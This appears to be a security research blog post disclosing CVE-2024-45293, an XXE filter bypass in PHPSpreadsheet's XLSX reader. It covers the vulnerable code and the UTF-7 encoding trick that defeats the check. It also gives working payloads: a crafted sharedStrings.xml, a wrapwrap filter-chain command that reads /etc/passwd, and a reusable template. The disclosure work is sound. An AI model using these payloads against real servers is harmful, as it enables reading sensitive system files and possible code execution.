CVE-2024-45293: XXE in PHPSpreadsheet's Excel parser

25 October 2024

The PHPSpreadsheet library, part of the widely used PHPOffice open-source suite, was found to be vulnerable to XML External Entity (XXE) injection. The vulnerability stems from flawed XXE sanitization filters in the XLSX reader, which parses user-supplied Excel spreadsheets.

Exploitation involves supplying a crafted Excel spreadsheet (XLSX) containing an XML file with an embedded payload. When the spreadsheet is processed, this payload can disclose the contents of sensitive files on servers running applications that depend on the library.

Although a fix for a similar XXE vulnerability was introduced in version 2.2.1, it was not sufficiently robust. This blog presents a bypass for the existing patch and explores the associated impacts.

Affected Versions include:

Since PHPSpreadsheet is the successor to the now-unmaintained PHPExcel and is widely adopted, this vulnerability affects a range of applications that use one of the library's core features.

The Shaheen research team reported the vulnerability in August; it was subsequently fixed and assigned CVE-2024-45293 on September 13th, 2024.

Background

For this analysis, we used a simple PHP script that leverages the PHPSpreadsheet library to load a file under our control. The file in question is an Excel spreadsheet in XLSX format, which contains our Proof-of-Concept payload.

The workflow follows standard practice for PHPSpreadsheet: first, the file is passed to IOFactory's load method; next, the active sheet is retrieved using getActiveSheet; finally, the sheet's contents are read using the getRowIterator/getCellIterator methods.

The application script is as follows:

<?php

require __DIR__ . '/vendor/autoload.php';
use PhpOffice\PhpSpreadsheet\IOFactory;
use PhpOffice\PhpSpreadsheet\Worksheet\Worksheet;

class SpreadsheetReader {
	/**
	 * Reads the active worksheet from a spreadsheet file and returns its data.
	 *
	 * @param string $filePath Path to the spreadsheet file.
	 * @return array Data from the active worksheet including title and cells.
	 */
	public function readSpreadsheet(string $filePath): array {
		// Load the spreadsheet
		$spreadsheet = IOFactory::load($filePath);

		// Get the active sheet
		$worksheet = $spreadsheet->getActiveSheet();
		return $this->readWorksheet($worksheet);
	}

	/**
	 * Extracts data from the provided worksheet.
	 *
	 * @param Worksheet $worksheet The worksheet to read.
	 * @return array Data from the worksheet including title and cells.
	 */
	public function readWorksheet(Worksheet $worksheet): array {
		$cellData = [];

		foreach ($worksheet->getRowIterator() as $row) {
			$cellIterator = $row->getCellIterator();
			$cellIterator->setIterateOnlyExistingCells(true);

			foreach ($cellIterator as $cell) {
				$cellData[] = [
					"Row" => $cell->getRow(),
					"Column" => $cell->getColumn(),
					"Value" => $cell->getValue(),
				];
				print_r($cell->getValue());
			}
		}
		return $cellData;
	}

}

// Example usage
$reader = new SpreadsheetReader();
$filePath = './poc.xlsx';
$data = $reader->readSpreadsheet($filePath);

print_r($data);

The script instantiates the SpreadsheetReader class and then calls its readSpreadsheet method on a file that we provide.

Parsing Excel (XLSX) sheets

public function readSpreadsheet(string $filePath): array {
	// Load the spreadsheet
	$spreadsheet = IOFactory::load($filePath);

	// Get the active sheet
	$worksheet = $spreadsheet->getActiveSheet();
	return $this->readWorksheet($worksheet);
}

The SpreadsheetReader relies on the IOFactory class from the library to load an appropriate reader based on the file extension provided.

This is done through the createReaderForFile function in IOFactory.

If the user provides a file with a supported extension (such as XLSX), a reader for that specific format is instantiated and subsequently used to load the file via the reader’s load function.

The Details

XLSX files are handled by the loadSpreadsheetFromFile method of the Reader\Xlsx class.

Since XLSX files are essentially ZIP archives of XML files (including .rels relationship files, which are themselves XML), the method calls loadZip multiple times to parse the individual files within the spreadsheet.

/**
* Loads Spreadsheet from file.
*/
protected function loadSpreadsheetFromFile(string $filename): Spreadsheet
{
	File::assertFile($filename, self::INITIAL_FILE);

	// Initialisations
	$excel = new Spreadsheet();
	$excel->removeSheetByIndex(0);
	$addingFirstCellStyleXf = true;
	$addingFirstCellXf = true;

	$unparsedLoadedData = [];

	$this->zip = $zip = new ZipArchive();
	$zip->open($filename);

	//	Read the theme first, because we need the colour scheme when reading the styles
	[$workbookBasename, $xmlNamespaceBase] = $this->getWorkbookBaseName();
	$drawingNS = self::REL_TO_DRAWING[$xmlNamespaceBase] ?? Namespaces::DRAWINGML;
	$chartNS = self::REL_TO_CHART[$xmlNamespaceBase] ?? Namespaces::CHART;
	$wbRels = $this->loadZip("xl/_rels/{$workbookBasename}.rels", Namespaces::RELATIONSHIPS);
	...
	...
	$rels = $this->loadZip(self::INITIAL_FILE, Namespaces::RELATIONSHIPS);
	...
	...

The loadZip function reads a named XML file from the uploaded spreadsheet's archive, parses it using simplexml_load_string, and returns the result as a SimpleXMLElement, as seen in the definition below.


private function loadZip(string $filename, string $ns = '', bool $replaceUnclosedBr = false): SimpleXMLElement
	{
		$contents = $this->getFromZipArchive($this->zip, $filename);
		if ($replaceUnclosedBr) {
			$contents = str_replace('<br>', '<br/>', $contents);
		}
		$rels = simplexml_load_string(
			$this->getSecurityScannerOrThrow()->scan($contents),
			'SimpleXMLElement',
			Settings::getLibXmlLoaderOptions(),
			$ns
		);

		return self::testSimpleXml($rels);
	}

Before parsing the contents of a file, the function passes them to the scan function of the XML security scanner (obtained through getSecurityScannerOrThrow), which validates them as a safeguard against XML External Entity (XXE) injection. As the scan function below shows, the content is first converted to UTF-8 and then rejected if it matches a pattern built from a blacklisted string:

	public function scan($xml): string
	{
		$xml = "$xml";
		$xml = $this->toUtf8($xml);

		// Don't rely purely on libxml_disable_entity_loader()
		$pattern = '/\\0?' . implode('\\0?', str_split($this->pattern)) . '\\0?/';

		if (preg_match($pattern, $xml)) {
			throw new Reader\Exception('Detected use of ENTITY in XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
		}

		if ($this->callback !== null) {
			$xml = call_user_func($this->callback, $xml);
		}
		return $xml;
	}

The $this->pattern property holds the string <!DOCTYPE.
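To illustrate what the \0? fragments in that regex are for, the sketch below rebuilds the pattern outside the library, assuming $this->pattern is '<!DOCTYPE' as stated above. The helper name doctypePattern is hypothetical. Because an optional NUL byte is allowed before, between and after each character, the same regex also catches UTF-16-style input in which every character is followed by a NUL byte. The sketch models only the regex step of scan(), not the preceding toUtf8 call.

```php
<?php
// Hypothetical helper mirroring the pattern construction in scan():
// an optional NUL byte (\0?) is allowed around every character of the needle.
function doctypePattern(string $needle = '<!DOCTYPE'): string
{
    return '/\\0?' . implode('\\0?', str_split($needle)) . '\\0?/';
}

$pattern = doctypePattern();
echo $pattern, "\n"; // /\0?<\0?!\0?D\0?O\0?C\0?T\0?Y\0?P\0?E\0?/

$samples = [
    'plain'           => '<!DOCTYPE foo []>',
    'NUL-interleaved' => "<\0!\0D\0O\0C\0T\0Y\0P\0E\0 foo",
    'no DOCTYPE'      => '<sst count="1"/>',
];
foreach ($samples as $label => $xml) {
    // preg_match() returns 1 on a match and 0 otherwise.
    echo $label, ': ', preg_match($pattern, $xml) === 1 ? 'rejected' : 'accepted', "\n";
}
```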

The vulnerability - Have some space

This blacklist approach assumes that the UTF-8 conversion always takes place when needed, before the resulting content is checked for the blacklisted string.

Looking at the toUtf8 function, it determines the encoding of the XML content through the findCharSet function:

private function toUtf8(string $xml): string
	{
		$charset = $this->findCharSet($xml);
		if ($charset !== 'UTF-8') {
			$xml = self::forceString(mb_convert_encoding($xml, 'UTF-8', $charset));

			$charset = $this->findCharSet($xml);
			if ($charset !== 'UTF-8') {
				throw new Reader\Exception('Suspicious Double-encoded XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
			}
		}

		return $xml;
	}

	private function findCharSet(string $xml): string
	{
		$patterns = [
			'/encoding="([^"]*]?)"/',
			"/encoding='([^']*?)'/",
		];

		foreach ($patterns as $pattern) {
			if (preg_match($pattern, $xml, $matches)) {
				return strtoupper($matches[1]);
			}
		}

		return 'UTF-8';
	}

<?xml version="1.0" encoding="UTF-8"?>

The findCharSet function uses regular expressions to look for the encoding attribute of an XML declaration such as the one above, and returns a default of UTF-8 if neither pattern matches the input.

If an encoding attribute is matched and it is not UTF-8, the content is converted to UTF-8, as seen in the first if block of toUtf8. The converted content is then passed to findCharSet again, and the load is aborted as suspicious double-encoded XML if a non-UTF-8 charset is still reported.

Herein lies the catch: this depends entirely on the regular expressions being a wide enough net to catch every possible way of declaring the encoding.

$patterns = [
			'/encoding="([^"]*]?)"/',
			"/encoding='([^']*?)'/",
		];

These patterns search the scanned content for encoding="…" or encoding='…'; however, they do not account for whitespace around the equals sign, which XML permits in attribute declarations (mainly for readability), e.g. encoding ='UTF-7'.

So an XML declaration such as the following:

<?xml version="1.0" encoding ='UTF-7'?>

will not have its contents converted from UTF-7 to UTF-8. Because the regex fails to match the encoding attribute, findCharSet falls back to its default and reports UTF-8. This makes it easy to encode the <!DOCTYPE string in UTF-7 and slip it past the security filter, which searches ONLY for the literal <!DOCTYPE, thus enabling XXE injection.
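The XML 1.0 grammar allows optional whitespace on either side of the = in an attribute (its Eq production), so encoding ='UTF-7' is a well-formed declaration. The sketch below copies the two findCharSet patterns quoted earlier into a standalone function and compares them with a whitespace-tolerant pattern. Both function names are hypothetical, and the tolerant variant only illustrates the missing case; it is not the upstream patch.

```php
<?php
// Standalone copy of the two patterns from findCharSet(), quoted above.
function findCharSetOriginal(string $xml): string
{
    $patterns = [
        '/encoding="([^"]*]?)"/',
        "/encoding='([^']*?)'/",
    ];
    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $xml, $matches)) {
            return strtoupper($matches[1]);
        }
    }
    // Nothing matched, so the declared charset is silently treated as UTF-8.
    return 'UTF-8';
}

// Hypothetical whitespace-tolerant variant, for comparison only (not the
// upstream fix): optional whitespace around "=", either quote style.
function findCharSetTolerant(string $xml): string
{
    if (preg_match('/encoding\s*=\s*(["\'])(.*?)\1/', $xml, $matches)) {
        return strtoupper($matches[2]);
    }
    return 'UTF-8';
}

$declarations = [
    '<?xml version="1.0" encoding="UTF-7"?>',
    "<?xml version=\"1.0\" encoding='UTF-7'?>",
    "<?xml version=\"1.0\" encoding ='UTF-7'?>",
    "<?xml version=\"1.0\" encoding= 'UTF-7'?>",
];
foreach ($declarations as $declaration) {
    printf(
        "%-42s original: %-6s tolerant: %s\n",
        $declaration,
        findCharSetOriginal($declaration),
        findCharSetTolerant($declaration)
    );
}
```

Only the first two declarations are detected as UTF-7 by the original patterns; the last two, which differ only in whitespace, are reported as UTF-8 and therefore skip the conversion.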

Excel shared strings

Since external entities declared in the DTD are not substituted by default, disclosing information through XXE is more complicated.

As such, we need a way to get the information we aim to disclose reflected back to us. This is where shared strings come in: Excel spreadsheets use them as a mechanism to save space and reduce redundancy when the file is saved to disk.

Repeated strings in the sheet's cells are inventoried, assigned an ID, and stored in the sharedStrings.xml file. Each cell then holds only the ID of its string rather than the string itself, ultimately saving space.

The point is that the shared strings file is itself an XML file, so we can inject our XXE payload there and have the value we want reflected back through the cells that reference those strings.
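The lookup that makes this reflection work can be sketched with SimpleXML alone. The XML below is a hand-written stand-in for a shared strings file and a single cell, not taken from a real workbook, and loadSharedStrings is a hypothetical helper; it reads only plain <t> entries and ignores rich-text runs. A cell marked t="s" stores an index in <v>, and its displayed value is whatever text sits at that index.

```php
<?php
// Hand-written stand-ins for sharedStrings.xml and a single worksheet cell.
$sharedStringsXml = <<<'XML'
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2" uniqueCount="2">
<si><t>abc</t></si>
<si><t>def</t></si>
</sst>
XML;

// t="s" marks a shared-string cell; <v> holds the index into the table above.
$cellXml = '<c xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" r="A1" t="s"><v>1</v></c>';

// Hypothetical helper: collect the plain-text <t> of each <si> entry, in order.
// (Rich-text <r> runs are ignored in this sketch.)
function loadSharedStrings(string $xml): array
{
    $sst = simplexml_load_string($xml);
    $strings = [];
    foreach ($sst->si as $si) {
        $strings[] = (string) $si->t;
    }
    return $strings;
}

$strings = loadSharedStrings($sharedStringsXml);
$cell = simplexml_load_string($cellXml);
if ((string) $cell['t'] === 's') {
    // The cell's displayed value is the shared string at that index.
    echo $strings[(int) $cell->v], "\n"; // def
}
```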

Disclosing the data - PHP filter wrapper & XML parameter entities

With the filter bypass discovered, we can inject XML entities and get them parsed.

The <!DOCTYPE filter can be bypassed by adding a space around the equals sign of the encoding attribute and using the UTF-7 representation (+ADw-) of the < character that precedes !DOCTYPE:

<?xml version="1.0" encoding= 'UTF-7' standalone="yes"?>
+ADw-!DOCTYPE abc [ ... ]>
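To see why the filter misses the UTF-7 form, the sketch below decodes +ADw- by hand. In UTF-7 (RFC 2152), + opens a run of modified base64 over UTF-16 code units, - closes it, and the = padding is omitted. The sketch sticks to base64_decode and unpack so it needs no mbstring or iconv; the variable names are illustrative.

```php
<?php
// "+ADw-" is UTF-7 for "<": "+" opens a modified-base64 run, "-" closes it,
// and the run encodes UTF-16BE code units with the "=" padding dropped.
$utf7Lt = '+ADw-';
$base64 = substr($utf7Lt, 1, -1);                            // "ADw"
$base64 .= str_repeat('=', (4 - strlen($base64) % 4) % 4);   // restore padding: "ADw="
$utf16be = base64_decode($base64, true);                     // "\x00\x3C"
$codePoint = unpack('n', $utf16be)[1];                       // big-endian 16-bit unit
// chr() is only valid here because U+003C is an ASCII code point.
printf("%s -> U+%04X (%s)\n", $utf7Lt, $codePoint, chr($codePoint));

// The declaration line as the scanner sees it, before any UTF-7 decoding:
// it contains no "<" at all, so a pattern requiring "<!DOCTYPE" cannot match.
$line = '+ADw-!DOCTYPE abc [ ... ]>';
var_dump(str_contains($line, '<'));                          // bool(false)
```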

However, as explained, there are some limitations that one has to work around. For example, external entities won't resolve due to the missing LIBXML_NOENT flag in the options passed to simplexml_load_string.

There is a trick that does work, however: using a combination of the PHP filter wrapper and parameter entities, we can define custom entities and then reference them within the XML. This sounds confusing, so the example below should help clarify the idea.

echo "<\!ENTITY internal 'abc'  >" | base64
<?xml version="1.0" encoding= 'UTF-7' standalone="yes"?>
+ADw-!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "php://filter//resource=data://text/plain;base64,PCFFTlRJVFkgaW50ZXJuYWwgJ2FiYycgID4K" > %xxe;]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1"><si><t>&internal;</t></si></sst>

When this is run, we can see that the internal entity is created and its value, abc, is used as the value of the shared string.

The internal entity created and parsed
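The base64 string in the example payload is simply the entity declaration from the echo command, encoded. The sketch below rebuilds the data: URI in PHP and decodes it again, showing the declaration that the %xxe parameter entity pulls into the DTD, which is what defines &internal;. The variable names are illustrative.

```php
<?php
// The declaration from the echo command above (echo appends the trailing "\n").
$entityDecl = "<!ENTITY internal 'abc'  >\n";
$prefix = 'data://text/plain;base64,';

// Encode it into a data: URI, as used in the payload's resource= target.
$dataUri = $prefix . base64_encode($entityDecl);
echo $dataUri, "\n";

// And back: decoding the base64 part yields the declaration itself.
$decoded = base64_decode(substr($dataUri, strlen($prefix)), true);
echo $decoded;
```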

This can be escalated to read internal system files utilizing the same PHP filter wrappers!

PHP filters allow us to read any resource accessible to the PHP process and even apply conversions and encodings to it before retrieval, such as base64 encoding/decoding. Chained together, they can also add prefixes and suffixes, which is the main source of complexity.
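As a harmless illustration of the mechanism (not of the wrapwrap chains themselves), the sketch below reads a throwaway temporary file through php://filter with two standard filters, string.toupper and convert.base64-encode, which are applied in order as the data is read. The file name prefix and contents are arbitrary.

```php
<?php
// Throwaway file standing in for "a resource on the system".
$path = tempnam(sys_get_temp_dir(), 'flt');
file_put_contents($path, 'abc');

// read= takes a "|"-separated list of filters, applied in order as data is read:
// string.toupper turns "abc" into "ABC", then convert.base64-encode yields "QUJD".
$uri = 'php://filter/read=string.toupper|convert.base64-encode/resource=' . $path;
$filtered = file_get_contents($uri);
echo $filtered, "\n"; // QUJD

unlink($path);
```

Chains like the one produced by wrapwrap rely on the same wrapper, but stack many convert.iconv and base64 filters so that the output gains a chosen prefix and suffix.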

We can't simply read the file and reflect its content directly, however, because of the flags passed to simplexml_load_string. We must get a little creative: we have to create an entity whose value is the file contents, so that referencing the entity yields that value. In other words, the resource loaded by the xxe parameter entity should resolve to <!ENTITY _name_ 'RESOURCE CONTENTS'>.

This can be achieved using PHP filter chains, which are described in detail by Synacktiv on their blog and by Charles Fol in his blog post on the wrapwrap tool. They are used to add a prefix of <!ENTITY _name_ ' and a suffix of '> around the file contents so that the result is valid XML syntax.

To that end, the wrapwrap script was used to generate the proof-of-concept. Note that the payload is lengthy: due to the length constraints of the simplexml_load_string function, the system literal can hold only around 50,000 characters, while a payload that extracts 54 characters is about 35,000 to 50,000 bytes, depending on the prefix and suffix.

Create the filter chain payload:

python wrapwrap/wrapwrap.py "/etc/passwd" "<\!ENTITY i '" "'>" 54

Sample chain:

php://filter/convert.base64-encode/convert.base64-encode/convert.iconv.855.UTF7/convert.base64-encode/convert.iconv.855.UTF7/conv....
...
...decode/dechunk/convert.base64-decode/convert.base64-decode/resource=/etc/passwd

Prepare the XXE payload:

<?xml version="1.0" encoding= 'UTF-7' standalone="yes"?>
+ADw-!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "PAYLOAD_GOES_HERE" > %xxe;]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1"><si><t>&ENTITY_NAME_GOES_HERE;</t></si></sst>

Once the modified sharedStrings.xml file containing the payload is parsed, a portion of /etc/passwd is disclosed, confirming that the XXE succeeded.

disclosing the /etc/passwd file using the XXE

Research such as Charles Fol's "Iconv, set the charset to RCE" raises the potential impact of this XXE vulnerability from simple file disclosure to (potential) remote code execution.

Affected Apps

PHPSpreadsheet is used across many PHP projects, including Moodle and Kimai.

Kimai uses PHPSpreadsheet for importing and exporting invoices. This functionality requires admin access to the platform; once such access is obtained, the vulnerability described above can be exploited by uploading a crafted XLSX invoice template that triggers the XXE.

This was reported to Kimai and was later fixed in version 2.21.0 alongside the PHPSpreadsheet patch.

Conclusion

Considering how widely PHPSpreadsheet is adopted, it's important that applications and frameworks using it update to the latest version.

Written By

Sultan Murad